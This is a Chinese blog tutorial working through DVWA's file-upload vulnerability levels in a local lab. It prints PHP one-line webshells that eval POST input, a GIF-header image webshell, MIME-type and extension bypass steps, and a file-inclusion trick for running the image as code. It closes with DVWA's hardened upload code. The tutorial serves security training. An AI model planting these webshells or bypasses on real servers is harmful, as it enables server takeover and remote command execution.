当前位置:
  1. 首页
  2. 互联网
  3. 正文
本文介绍: 文件上传漏洞广泛存在于Web1.0时代恶意攻击者的主要攻击手法是将可执行脚本(WebShell)上传目标服务器,以达到控制目标服务器的目的。

文件上传漏洞广泛存在于Web1.0时代恶意攻击者的主要攻击手法是将可执行脚本(WebShell)上传目标服务器,以达到控制目标服务器的目的。

此漏洞成立的前提条件至少有下面两个

1.可以上传对应脚本文件,并且被服务器解析比如php上传为.php,Java则上传jar包等

2.上传文件之后,攻击者知道文件地址,也就是说可以从浏览器地址栏访问到文件。

使用本地dvwa靶场进行实战

1. 防护级别为低(low

书写脚本文件1.php,:

<?php 
	phpinfo();
?>

进入文件上传模块

点击上传,上传成功,并且可以看到上传的地址,这里满足条件1:

浏览器拼接相关地址,http://localhost:5555/vulnerabilities/upload/#/../../hackable/uploads/1.phphttp://localhost:5555/hackable/uploads/1.phphttp://localhost:5555/vulnerabilities/upload/#/../../hackable/uploads/1.php

发现成功输出了文件信息这里满足条件2。

如果在平时的渗透测试中,到这一步已经证明了漏洞存在。但是我为了增强实战能力编写对应的可执行脚本如下,这段代码简单,从post请求获取cmd参数,并且执行。这被称为一句话木马,相信大家知道了,通过http://localhost:5555/hackable/uploads/1.php发出post请求即可执行任意命令,也就是等于拿到了服务器权限

记得重新上传这个执行脚本

<?php 
	eval($POST['cmd']);
?>

一键使用此木马工具以前有中国菜刀,现在有中国蚁剑(antsword)。我使用最新antsword

但是如下图发现返回数据为空,猜测是php版本为7导致的,所以我需要修改一下一句话木马

修改如下代码,希望可以运行成功,但是居然报了这么多的错误

<?php 
	$pst = $POST['cmd'];
	eval(pst);
?>

继续排查原因,原来是第一行的分号写错了。

执行代码如下

<?php 
	$pst = $_POST['hacker'];
	@eval($pst);
?>

右下角提示连接成功: 

点击添加即可使用右键可以查看支持功能

打开虚拟终端,已经拿下了服务器权限

 

2.防护等级为中(medium

点击查看源代码发现通过type判断,于是可以使用burp修改发送数据包实现改变。

修改content typeimag/png

 

上传成功:

3.防护等级为高(High

查看源代码发现使用后缀名判断

 

看到其对后缀名做了限制jpg、jpegpng),并且使用getimagesize函数确定文件头为图片

所以我们在文件头加上图片标识

GIF89
<?php 
	$p = $_POST['cmd'];
	@eval($p);
?>

重命名为2.jpg,上传成功:

但是这是jpg文件,无法被服务器执行,所以我们使用前面的文件包含漏洞来执行:

但是我的文件包含没打开,即allow_url_include = Off

使用以下命令打开,我的行数为824,如果不知道你的就cat确定

docker exec -it [容器id]  /bin/bash # 进入容器
cd /etc/php/7.0
sed -i '824s/.*/allow_url_include = On/' php.ini
docker restart [容器id] # 重启容器

然后再次尝试上传文件成功,在地址栏打开,注意我修改端口号http://127.0.0.1/vulnerabilities/fi/?page=file:///var/www/html/hackable/uploads/2.jpg

但是使用蚁剑无法连接,不知道为什么,于是我又去做了一个图片马。

还是连接失败,虽然文件上传成功了。

搞了很久才成功

使用记事本打开jpg,在后面加上代码

这里低中高危难度通过了。

我们看看可能出现漏洞的代码,可以看到其不仅判断了文件类型,还将文件名使用md5的方式进行了加密,就算上传可执行文件成功,攻击者也无法知道具体的文件名。还对文件内容做了限制,并且加上了CSRF验证

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );


    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &amp;&amp;
        ( $uploaded_size < 100000 ) &amp;&amp;
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &amp;&amp;
        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

 

显示所有内容
上一篇 分享一个适用于 Vue3 的好的组件库,PrimeVue组件。
下一篇 医院不良事件报告系统源码带鱼骨图分析

相关文章

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

插入图片
浏览器会保存昵称、邮箱和网站cookies信息,下次评论时使用。